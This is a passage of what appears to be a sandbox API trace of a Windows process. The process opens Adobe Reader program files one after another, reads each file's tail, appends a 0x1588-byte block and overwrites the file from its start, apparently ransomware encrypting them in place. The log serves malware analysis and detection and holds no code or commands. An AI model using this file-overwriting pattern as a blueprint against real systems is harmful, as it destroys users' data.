lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0069.167] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0069.171] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb2f5 [0069.171] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.172] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb2f5 [0069.172] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea99b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.173] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0069.173] WriteFile (in: hFile=0x1e4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0069.173] CloseHandle (hObject=0x1e4) returned 1 [0069.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.175] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.175] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3a6af [0069.175] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.175] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.175] ReleaseMutex (hMutex=0x168) returned 1 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0069.176] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0069.178] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x396af [0069.178] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.180] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x396af [0069.180] WriteFile (in: hFile=0x1e4, lpBuffer=0x2865858*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865858*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.180] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0069.180] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0069.181] CloseHandle (hObject=0x1e4) returned 1 [0069.193] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\dva.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0069.640] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.641] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4c00 [0069.648] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.652] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.652] ReleaseMutex (hMutex=0x168) returned 1 [0069.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.CAT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.CAT", cchWideChar=7, lpMultiByteStr=0x1f7abac, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.CAT", lpUsedDefaultChar=0x0) returned 7 [0069.652] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.724] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3c00 [0069.725] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.725] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3c00 [0069.725] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.726] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0069.726] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.726] CloseHandle (hObject=0x1e8) returned 1 [0069.727] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RdLang32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\rdlang32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0069.728] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.728] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x158e00 [0069.728] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.728] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.728] ReleaseMutex (hMutex=0x168) returned 1 [0069.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CAT", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.CAT", lpUsedDefaultChar=0x0) returned 12 [0069.729] ReadFile (in: hFile=0x1e8, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0069.732] ReadFile (in: hFile=0x1e8, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.733] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x157e00 [0069.733] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.779] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x157e00 [0069.780] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e956a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e956a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.781] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0069.781] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0069.781] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.782] CloseHandle (hObject=0x1e8) returned 1 [0070.454] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Spelling.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\spelling.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0070.454] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.454] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2a00 [0070.454] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.455] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.455] ReleaseMutex (hMutex=0x168) returned 1 [0070.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CAT", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.CAT", lpUsedDefaultChar=0x0) returned 12 [0070.455] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.457] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0070.457] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.458] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0070.458] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.458] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0070.458] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.458] CloseHandle (hObject=0x1e8) returned 1 [0070.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Checkers.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\checkers.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0070.460] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.460] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1da00 [0070.460] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.460] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.461] ReleaseMutex (hMutex=0x168) returned 1 [0070.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CZE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0070.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CZE", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.CZE", lpUsedDefaultChar=0x0) returned 12 [0070.461] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865458, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0070.464] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1ca00 [0070.465] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.465] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1ca00 [0070.465] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.465] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0070.465] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.466] CloseHandle (hObject=0x1e8) returned 1 [0070.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\pddom.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\pddom.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0070.473] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.474] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2a00 [0070.474] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.474] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.474] ReleaseMutex (hMutex=0x168) returned 1 [0070.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CZE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CZE", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.CZE", lpUsedDefaultChar=0x0) returned 9 [0070.474] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.477] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0070.477] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.477] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0070.477] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.478] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0070.478] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.478] CloseHandle (hObject=0x1e8) returned 1 [0070.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0070.481] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.481] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x9342 [0070.481] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0070.482] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.482] ReleaseMutex (hMutex=0x168) returned 1 [0070.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0070.482] ReadFile (in: hFile=0x1e8, lpBuffer=0x2865458, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0070.484] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8342 [0070.484] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.485] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8342 [0070.485] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.486] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0070.486] WriteFile (in: hFile=0x1e8, 